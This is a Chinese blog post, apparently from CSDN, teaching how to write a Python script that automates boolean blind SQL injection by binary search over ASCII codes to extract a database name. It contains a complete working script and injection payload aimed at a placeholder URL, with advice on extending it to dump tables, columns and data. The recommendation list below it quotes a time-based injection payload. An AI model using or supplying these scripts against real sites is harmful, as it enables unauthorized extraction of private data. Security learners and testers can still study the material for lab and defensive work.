Python编写盲注自动化脚本

最新推荐文章于 2024-05-02 00:36:59 发布
最新推荐文章于 2024-05-02 00:36:59 发布
阅读量1.4k 收藏 4
点赞数 3
文章标签: python 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42990434/article/details/106110955
版权

注入中盲注它要花费很多时间进行排除,所以作为小白的我也想尝试如何去编写简单的 python脚本,来提高挖盲注的效率。
说到盲注的排除,我们第一时间就会想到二分法,因为不可能逐个逐个的用 “=” 去排除,这样浪费的时间会更多,所以脚本的编写我也是用二分法的,下面我会用自己盲注数据库名字的例子来说明一下:

#!/usr/bin/env python
# coding:utf-8

import requests
import sys

url = "http://xxx.xxx.xxx.xxx/xxx/xxx.php?table=%s"
data = ' '
pay = ' '  

def database(url):
   
    payload = "(select(id)from`user`where(id=(case(1)when(ascii(substr(database(),%s,1))>%s)then(select(1))else(select(2)union(select(1)))end)))"

    print("Start enumerating databases:")
    for i in range(1, 8):           
        max = 122  # z
        min = 47  # /
        while abs(max - min) > 1:
            mid = int((max + min) / 2)
            pay = payload % (str(i), str(mid))
            response = requests.get(url % pay)                                              
            if response.content.find("此处填写返回正确的回显文本") != -1:
                min = mid            
            else:
                max = mid
        data = data + chr(max)
        print("The databases is :%s" % data)  
            
 
def main():  
	database(url)
        
              
if __name__ == '__main__':
    main()

注:
1、该payload只是我自己构造的,视实际情况而定,要注意的是payload里面用的两个%s传参,第一个参数是指数据库名字的位数,第二个是指我们用来排除的ascii码值。
2、先用for循环做一个大的循环,for是循环数据库名的位数的,里面的while循环是用来进行二分法的排除的。
3、这里的盲注是正确的话页面回显文本不一样,然后我们搜索正确的响应文本的以此作为二分法的判断依据的。

列举数据库名字的代码就是这些,其实知道方法之后,自己构造payload,列举其它如:表名,列名,数据这些也是很简单的,照猫画虎的写出来就行了。

玖飞
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自动化脚本编写实例-python
vivianliulu的博客
07-03 10万+
自动化脚本编写实例
python自动化脚本
qq_40468470的博客
07-16 226
环境: pthon 3.8 requests 2.25 ddt 1.4 pyyaml 5.4 模块部署: 项目文件夹:pystudent 下面建立四个文件夹:case、commen、interface、reprot,分别存放测试用例、测试报告生成包、接口封装、html测试报告。如下: 在接口自动化之前,我们首先得把单个得接口封装好。 interface文件夹内封装insetrequests.py # 接口 class req(object): def __init__(self,s):
时间盲注python脚本.zip
12-28
python编写时间盲注自动化脚本
POST基于时间和布尔盲注
qq_60876907的博客
07-19 261
命令:uname=admin' and (select if (length(datebase()>5,sleep(5),null))) -- &passwd=admin&submit=Submit。存在注入点POST提交的参数 + and if (length(datebase())>5,sleep(5),null).如果执行的时间页面响应时间大于5 秒,肯定存在注入点,并且对应的SQL 语句执行。1,在存在注入点POST提交的参数后加入 if 判断正确或者错误的语句。2,POST基于时间盲注
2024年网络安全最新超硬核,SQL注入之时间盲注,原理+步骤+实战思路
最新发布
2401_84252281的博客
05-02 237
如果页面响应时间超过5秒,说明长度判断正确(sleep(5));如果页面响应时间不超过5秒(正常响应),说明长度判断错误,继续递增判断长度。
时间盲注,布尔盲注脚本
星星的博客
07-01 397
sql盲注
SQL-labs练习记录(16~20)【post时间盲注,密码注入,UA注入,referer注入,cookie注入】
bin789456的博客
08-22 458
post时间盲注,附带新脚本,从包入手,更改各项数据。
Python接口自动化测试之详解post请求
热门推荐
weixin_67553250的博客
11-02 1万+
在HTTP协议中,与get请求把请求参数直接放在url中不同,post请求的请求数据需通过消息主体(request body)中传递。 且协议中并没有规定post请求的请求数据必须使用什么样的编码方式,所以其请求数据可以有不同的编码方式,服务端通过请求头中的 Content-Type 字段来获知请求中的消息主体是何种编码方式,再以对应方式对消息主体进行解析。
布尔盲注python脚本.zip
12-28
Python中,我们可以编写脚本自动化这个过程。 在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注Python脚本。下面...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
pythonSQL注入仿SQLMAP脚本.rar
09-26
Python SQL注入仿SQLMAP脚本是针对网络安全领域的一个实践项目,主要涉及到的是利用Python编程语言来模拟著名的自动化SQL注入工具SQLMAP的功能。SQL注入是一种常见的网络安全漏洞,攻击者通过构造特殊的SQL语句来...
自己动手编写SQL注入漏洞扫描器
12-24
例如,学校或企业的网络管理员可能需要对数十乃至数百个内部网站进行自动化安全检查。 2. **支持HTML格式扫描报告的生成** - HTML格式的报告易于阅读且便于进一步处理和分发。这种格式已经成为许多软件工具的标准...
SQL注入之基于布尔的盲注详解
09-10
在实际操作中,由于手动进行布尔型盲注非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 871
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
Python脚本-时间盲注
m0_74317362的博客
09-23 1053
添加了time.sleep(0.05)
python布尔盲注脚本
kiihuang的博客
03-28 500
使用python编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
SQL 盲注GET /POST、布尔型,延时型Python脚本
小锤队长的博客
08-09 4294
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔型: import requests result = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...
基于python的布尔盲注爆破脚本sqli-libs第八关)
henghengzhao_的博客
10-06 1836
这个脚本的原因是因为布尔爆破步骤的繁琐,因此下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1611
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
python编写linux自动化脚本
05-11
Python是一个非常适合编写Linux自动化脚本的编程语言。下面是一个简单的例子,展示如何使用Python编写一个自动化脚本: ```python #!/usr/bin/env python import os # 执行命令 os.system("ls -l") # 切换目录 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值